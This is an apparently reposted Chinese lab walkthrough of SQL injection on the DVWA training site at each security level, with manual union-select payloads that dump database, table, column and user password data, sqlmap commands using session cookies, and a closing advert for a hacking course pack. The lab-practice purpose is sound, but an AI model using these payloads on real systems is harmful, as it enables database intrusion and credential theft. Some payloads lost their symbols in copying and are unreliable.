DVWA 全等级 SQL 注入漏洞拆解,sqlmap 自动化攻击实战指南
黑盒测试靶场练习注意使用burp时需要编码LOW一、输入数值查看页面变化页面出现了新信息应该是后端查询数据库中的数据后返回猜测有sql注入漏洞GET型传参这里使用抓包工具burp操作后续二、基础流程是判断注入点这里只有id一个那就是id了判断闭合方式’)或其它考虑使用什么方式注入联合报错布尔时间盲注等是否存在过滤获取库表字段数据三、操作2and 11-- # 多数数据库中使用--空格作为注释URL编码中空格编码为少数使用#作为注入注意burp中ctrl uurl编码ctrl shift uurl解码发现无论输入2and 11--还是2and 12--都报错有问题输入2 and 21--页面都正常显示查看页面报错的信息和页面能够正常显示判断输入语句中始终多了个‘判断是注释符有问题那就使用#作为注释符尝试2and 11#有显示了2and 121#无显示数据输入第一个语句后有显示且正常输入第二语句后显示页面内容为空判断出闭合方式为’闭合且无过滤那就是用最简单的联合查询获取信息四、联合查询操作判断回显列数1 order by 3#将3换成2后页面显示正常判断出列数是2列判断回显位1 union select 1,2#12都显示了那就是12都显示这里注意联合查询是要先让第一个查询结果报错在查询后面的不然的话显示不出想要的结果正常的应该是-1 union select 1,2#后续就是查库和表数据等了# 库 union select group_concat(schema_name from information_schema.schemata# # 表 union select group_conat(table_name from information_schema.tables where table_schema security # # 字段 union select 1,group_concat(column_name),3 from information_schema.columns where table_nameusers# # 具体数据 union select 1,group_concat(username,0x3a,password),3 from users-- -- 0x3a是冒号依次操作就行了五、判断出id字段中存在闭合方式为‘闭合的sql注入问题Medium由于手动测试比较麻烦后续使用sqlmap工具测试一、页面是选项框输入估计是限制用户输入内容防护sql注入页面是POST请求那可以使用抓包工具直接修改信息测试我直接使用slqmap测试DVWA靶场是需要登录的所以这里测试的时候需要携带好cookie防止无法成功测试# 这里是在windows下安装的SQLmap python sqlmap.py -u 自己网页URL --data post请求中的数据 -p id --cookie 自己的值 --batch # 下面是我操作注意换URL和cookie python sqlmap.py -u http://dvwa.cmd/dvwa/vulnerabilities/sqli/# --data id1SubmitSubmit -p id --cookie securitymedium; PHPSESSIDha8eqgdluhml3rar1tvd79im46 --batch-u指定探测地址-p指定探测字段--data指定传入参数batch是让其自动给填写Y/Nid字段存在布尔盲注报错注入时间盲注联合注入通过输出的payload判断出来闭合方式是数字型的那后续就就简单了直接爆库表字段和数据即可# 直接在当前语句后加 --dbs所有库 -D 库名 --tables 所有表名 —D 库名 —T表名 --dump 所有数据二、页面存在id存在POST传参型slq注入漏洞High一、发现页面存在跳转输入页面和显示页面是不同的网页那页面就将联合查询和报错注入阻止了输入信息后页面无有用的信息可以用二、使用sql盲注进行操做这里就直接使用sqlmap操作python sqlmap.py -u 输入信息的url地址 --data 参数值 --second-url 显示信息的url地址 --cookie 具体值 --batch # 自己的操作指令注意修改URL和cookie跳转地址 python sqlmap.py -u http://dvwa.cmd/dvwa/vulnerabilities/sqli/session-input.php --data id1SubmitSubmit --second-url http://dvwa.cmd/dvwa/vulnerabilities/sqli/ --cookie securityhigh; PHPSESSIDn0bccn6mk33jvnadftnukpm1g7 --batch–second-url 存在有也面跳转的输入测试获取到信息存在注入类型和闭合方式后续操作就是查看库表等信息三、网页做了页面跳转来防止注入但不影响盲注所以页面存在SQL注入Impossible一、页面回到了初始的样子用户可以输入信息输入正确信息是页面显示正常内容当输入注入语句或输入没有的id后页面不显示内容1 and 11#抓包查看请求体中存在一次性的tokenuser_token,导致无法使用sqlmap测试自己输入任何非数字的信息前端都不显示那就是后端做了严格的过滤和转义操作#####DVWA – 004如何系统学习网络安全/黑客网络安全不是「速成黑客」而是守护数字世界的骑士修行。当你第一次用自己写的脚本检测出漏洞时那种创造的快乐远胜于电影里的炫技。装上虚拟机从配置第一个Linux环境开始脚踏实地从基础命令学起相信你一定能成为一名合格的黑客。如果你还不知道从何开始我自己整理的282G的网络安全教程可以分享我也是一路自学走过来的很清楚小白前期学习的痛楚你要是没有方向还没有好的资源根本学不到东西下面是我整理的网安资源希望能帮到你。需要的话可以V扫描下方二维码联系领取~如果二维码失效可以点击下方链接去拿一样的哦【CSDN大礼包】最新网络安全/网安技术资料包~282G无偿分享1.从0到进阶主流攻防技术视频教程包含红蓝对抗、CTF、HW等技术点2.入门必看攻防技术书籍pdf书面上的技术书籍确实太多了这些是我精选出来的还有很多不在图里3.安装包/源码主要攻防会涉及到的工具安装包和项目源码防止你看到这连基础的工具都还没有4.面试试题/经验网络安全岗位面试经验总结谁学技术不是为了赚$呢找个好的岗位很重要需要的话可以V扫描下方二维码联系领取~因篇幅有限资料较为敏感仅展示部分资料添加上方即可获取如果二维码失效可以点击下方链接去拿一样的哦【CSDN大礼包】最新网络安全/网安技术资料包~282G无偿分享
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2547827.html
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!